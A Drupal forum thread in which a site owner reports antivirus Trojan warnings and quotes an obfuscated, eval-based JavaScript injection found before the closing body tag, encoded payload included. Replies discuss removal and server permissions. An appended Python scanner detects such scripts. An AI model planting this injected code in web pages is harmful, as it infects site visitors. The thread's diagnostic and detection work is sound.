By dutchie76 on
Hi,
Our latest Drupal multi-site is being flagged by AVG and Kaspersky Internet Security 2009 as having 2-3 Trojans triggered when users visit the site. My host has said they have since scanned the server for viruses and have given the all clear.
Firstly we have recently upgraded from 6.6 to 6.8. The difference between the two is that we now notice just before the closing body tag the following JS:
function nbnb25(z) {var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,22,42,28,40,58,37,3,7,35,0,0,0,0,0,0,36,34,57,54,26,1,52,4,38,14,39,0,47,24,2,59,16,50,30,29,46,6,45,20,17,31,60,0,0,0,0,8,0,19,41,61,56,32,21,27,5,25,43,9,11,23,10,49,15,33,48,13,12,44,55,62,51,53,18);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<>=8;w-=2}else{w=6}}}eval(h);}}nbnb25('Xw_ANHM@_mb@8nB@fTSrAH_A7U3vNHMqaTde_nkQXzB9zI4xEjc9KzBqlI4o_RdA7TcFfYVeUmk6hTsoInb@1QSQk0S61IdeNAZ9_NMAkliQi83xjR4@IAt6kIkAN5Z28nb9_aBq_nMAl5ZxtYVFmpSFpv3ramcyNU3xEauoXw4ez5dCmlSyUOdepU49zTcvYg36zwbA7TsoNwM612dqYQsAkAdeG9VCk0_eWRdA7ASrp7')
After this there is
which is the site's IP.
Does anyone know what this code is? My coder thinks it's something to do with the 6.8 upgrade or an upgraded module.
If this JS is sound, any ideas where we can look?
Any help is greatly appreciated.
Thanks,
Dutchie
Comments
Do not publish harmful code
Please do not publish harmful code in the open. Just publish the function name.
You should disable all modules and see if the code is still there. Later try to enable a module at a time.
You will need to find the source of the infection or redo your web site.
/*_*/
http://www.xmacinfo.com
Are you sure that this code
Are you sure that this code is what the antivirus programs are complaining about? I don't know of anything in core that adds this. Other modules, I don't know.
If you have a test site--something I highly recommend--you can check to see if the code is present on that site as well.
---
"Nice to meet you Rose...run for your life." - The Doctor
My first public Drupal site - EyeOnThe503
malware
If you google for a keyphrase in the script .. "c=z.length" .. you'll find a number of references to malware ..
e.g.
http://badwarebusters.org/main/itemview/405
how to report these issues
Please see My site was defaced ("hacked"). Now what?
This is exactly the wrong way to report issues.
That said, this is very likely a server misconfiguration issue/weak password/use of ftp weakness that was exploited rather than a weakness in Drupal core. See Secure Configurations for information on how to configure your server securely.
--
Growing Venture Solutions | Drupal Dashboard | Learn more about Drupal - buy a Drupal Book
--
Morris Animal Foundation
thanks all for your advice.
thanks all for your advice. I did suspect that the JS was the culprit.
Permissions have been a real issue for us and this could be the most likely reason for the lapse in security. Image upload permissions have forced us to 777 for certain folders which would not normally have these permissions.
Does anyone have any solutions as to how to go about removing the malicious script? Is it encrypted?
I would welcome anyone to look at the site in more detail and lend their advice to solve the issue and identify any vulnerability, and I would be more than happy to pay anyone for their time.
I would sticky the URL to anyone who can lend their expertise.
seems like others report same problem
http://drupal.org/node/356093
So far we have not managed to isolate the problem, remove the script, understand how exactly it happened, or how to prevent it happening again.
If anyone has any other recommendations not already mentioned it would be very much appreciated.
cheers
dutchie
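A defender-side triage script, added here and not posted by anyone in the thread, that turns the "search for a keyphrase in the script" suggestion above into a scan of a webroot: it scores each <script> block for the decoder-plus-eval pattern and flags blocks that sit directly before </body>. The <script> wrapper, the file extensions and the sample page are assumptions; the payload string in the sample is a constructed placeholder, not the one from the thread.

```python
import re
from pathlib import Path
from typing import Dict, List

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.DOTALL | re.IGNORECASE)
FUNC_RE = re.compile(r"function\s+(\w+)\s*\(")
# One long run of letters/digits/@/_ passed as a string: the encoded payload.
LONG_LITERAL_RE = re.compile(r"['\"][A-Za-z0-9_@+/=]{40,}['\"]")
# Tokens taken from the decoder discussed in the thread (charCodeAt walk, eval).
INDICATORS = ("eval(", "charCodeAt", "c=z.length", "fromCharCode")

def score_script(js: str) -> int:
    """Count how many obfuscation indicators a script body shows."""
    hits = sum(1 for token in INDICATORS if token in js)
    if LONG_LITERAL_RE.search(js):
        hits += 1
    return hits

def find_injected_scripts(html: str, threshold: int = 3) -> List[Dict]:
    """Return suspicious <script> blocks with their decoder name and placement."""
    findings = []
    body_close = html.lower().rfind("</body>")  # lower() keeps offsets intact
    for m in SCRIPT_RE.finditer(html):
        js = m.group(1)
        s = score_script(js)
        if s < threshold:
            continue
        name_m = FUNC_RE.search(js)
        findings.append({
            "function": name_m.group(1) if name_m else None,
            "score": s,
            "offset": m.start(),
            # The tell-tale placement from the thread: last thing before </body>.
            "before_body_close": body_close != -1 and html[m.end():body_close].strip() == "",
        })
    return findings

def scan_tree(root: str, exts=(".html", ".htm", ".php", ".inc")) -> Dict[str, List[Dict]]:
    """Walk a webroot (assumed extensions) and report files with suspicious scripts."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.name.endswith(exts):
            hits = find_injected_scripts(path.read_text(errors="replace"))
            if hits:
                results[str(path)] = hits
    return results

# Constructed sample: one harmless script plus an injected decoder modelled on the
# thread's snippet. The payload is a placeholder, not real encoded content.
SAMPLE_HTML = """<html><body><p>Hello</p>
<script>var page='home';</script>
<script>function qq17(z){var c=z.length,b=0,h='';for(;c>0;c--){h+=String.fromCharCode(z.charCodeAt(b++)-1);}eval(h);}qq17('PLACEHOLDERPAYLOADxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx')</script>
</body></html>"""
```

Run `scan_tree("/path/to/webroot")` against a copy of the site; each hit names the decoder function, which is the one detail the first reply says is safe to share when asking for help.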
iframe malware removal
There are several variations of iframe malware coming up every month. Here is the summary of different variations and possible removal techniques:
http://paramprojects.com/website/badwarefaq